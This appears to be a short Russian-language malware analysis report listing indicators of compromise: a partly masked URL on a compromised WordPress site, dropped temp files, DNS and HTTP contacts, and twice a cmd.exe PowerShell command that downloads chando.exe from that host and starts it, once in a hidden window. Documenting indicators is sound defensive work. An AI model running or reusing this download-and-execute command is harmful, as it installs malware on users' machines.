Техническая информация
- http://tu####ytudong.net/wp-content/themes/datnenbinhduong.vn/images/patterns/chando.exe как %temp%\xyutamplaval.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://tu####ytudong.net/wp-content/themes/datnenbinhduong.vn/images/patterns/chando.exe','%TEMP%\xyutamplaval.exe');Start-Process '...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1584
- %TEMP%\861999.cvr
- %TEMP%\xyutamplaval.exe
- 'tu####ytudong.net':80
- http://tu####ytudong.net/wp-content/themes/datnenbinhduong.vn/images/patterns/chando.exe
- http://tu####ytudong.net/cgi-sys/suspendedpage.cgi
- DNS ASK tu####ytudong.net
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://tu####ytudong.net/wp-content/themes/datnenbinhduong.vn/images/patterns/chando.exe','%TEMP%\xyutamplaval.exe');Start-Process '...' (со скрытым окном)